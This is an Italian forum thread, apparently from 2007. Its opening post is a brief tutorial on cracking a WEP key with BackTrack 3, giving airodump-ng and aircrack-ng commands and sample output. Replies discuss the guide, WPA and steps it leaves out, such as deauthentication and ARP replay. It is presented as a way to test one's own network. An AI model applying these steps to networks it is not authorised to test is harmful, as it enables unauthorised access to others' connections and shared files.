Wireless hack - testiamo la nostra linea senza fili in soli 5minuti and 10secondi

Stato
Discussione chiusa ad ulteriori risposte.

dark shadow

Utente Electrum
11 Giugno 2007
284
42
0
150
**CREDIT**
Dovete testare la vostra linea wireless ed avete poco tempo? Come tutti ben sappiamo il pericolo è sempre dietro l’angolo e per questo è necessario prevenire, scopriremo oggi come un qualsiasi malintenzionato potrebbe facilmente accedere alla nostra connessione internet, sfruttarla, ed entrare in possesso dei vostri file condivisi; il tutto in 5minuti e 10 secondi.

Componenti utilizzati:

- 1 router wi-fi collegato al fisso

- 1 portatile avente scheda wireless.

Ricordo che in questo procedimento ho cercato di eliminare ogni passaggio superfluo, riducendo i tempi ed ottimizzando l’intera procedura.

1) Inseriamo la distro live di backtrack3 nel laptop e carichiamola.

2) Apro il terminale e digitiamo “iwconfig†–>controllo che non sia associata a niente la scheda, essendo la distro live, come impostazione di default non dovreste modificare niente.

3)da terminale “airodump-ng -c 11 –write dump wlan0 “, dove 11–>è il canale e wlan0 è l’interfaccia.

4) una volta raccolti circa 50000 pacchetti…ci ha messo davvero pochissimo..ho dato da terminale:

aircrack-ng -z -b mac_ap dump-01*.cap

*mac_ap: è ovviamente il mac della scheda “vittimaâ€ÂÂ

* dump-01.cap –> è il nome del file con il quale i pacchetti vengono catturati(ho notato che questo valore è incrementale).

dopo circa dieci secondi la shell mi restituisce:

opening dump-01.cap
attack will be restarted every 5000 captured ivs.
starting PTW attack with 50518ivs.
KEY FOUND! [1*:77:1E:1*:*8]
Decrypted correctly: 100%

Per motivi di privacy ovviamente ho alterato la pass con degli asterischi, fatene buon uso, ricordo che violare reti altrui è illegale e punibile.

Alcune precisazioni:

- la chiave in questione era una wep a 64bit

- il router era un Netgear v3

- Per capire il tutorial bisogna avere una minima base.
se avete bisogno, postate qua;)
 
adesso appena ho un attimo di tempo lo faccio...che tool esistono x registrare a video su bt3==?ads mi informo..
 
sono già integrati entrambi vero?! dmn mattina li provo.. Ak3R so che te ne intendi abbastanza di reti anche a livello wireless...cosa ne pensi di questa guida, conta che ho tralasciato alcuni aspetti che considero acquisiti di base; non vorrei fosse "indecifrabile" per un utente medio...
 
Bravo, bella guida... c voleva proprio...

OT... "dark shadow" ho appena "decriptato" la tua firma... :asd: :asd: ottima frase :hail:
 
[ot]
Torre1992 ha detto:
ottima frase :hail:
bhe al massimo:
Codice:
01110100 01110101 01111000 00100000 01101101 01100101 01100001 00100000 01101100 01110101 01111000
questa è una bella frase....nn quella![/ot]
 
:asd: :asd:

Dai vabè torniamo alla discussione che è meglio... :lol:
 
Ottima guida... breve e concisa e molto chiara. Mi complimento con l'autore.. :hail: Volevo sapere se la cifratura della rete è di tipo wpa o wpa2 come si evolve la situazione.. il tool utilizzato (aircrack se non vado errato) necessita parametri particolari per elaborare questo standard di cifratura? Ho intenzione di testare le mia rete (in cui ho impostato come cifratura WPA2) e vedere se è abbastanza sicura.. e prima di procedere ho bisogno di queste info.. vi ringrazio in anticipo per le eventuali risposte :)

saluti :cool:
 
ciao dark... la tua guida secondo me pecca di particolari importanti, l'attacco va portato avanti in modo diverso a seconda che ci siano client associati o meno, manca la deauth/fake, manca il "forge", manca il replay delle arp, io non so come tu abbia crackato la tua rete in 5 minuti senza questi passaggi... quali sono i pacchetti che hai raccolto??? (io lo so che sono gli IVs ma altri potrebbero non saperlo), su airodump mancano i filtri (hai impostato solo il canale) ma nè essid nè bssid sono impostati...
@kattivik: LA WPA NON SI CRACKA... PER GIOVE SIGNORI!!!!
 
[ot]trank kattivik sono io che avendo sempre la f**a in testa ogni 28 gg ho le mie cose dal naso e sclero!! LOL (rubata allo zoo ;)) [/ot]
 
Io ho fatto un video mentre stavo craccando una WEP ma non so come ofuscare i MAC nel video... se mi dite come fare lo posto
 
bhe credo che devi offuscarlo su ogni singolo frame del video!Con un buon programma di video editing dove è possibile usare i frame e l'ancoraggio non credo ci voglia poi tanto :D
 
Stato
Discussione chiusa ad ulteriori risposte.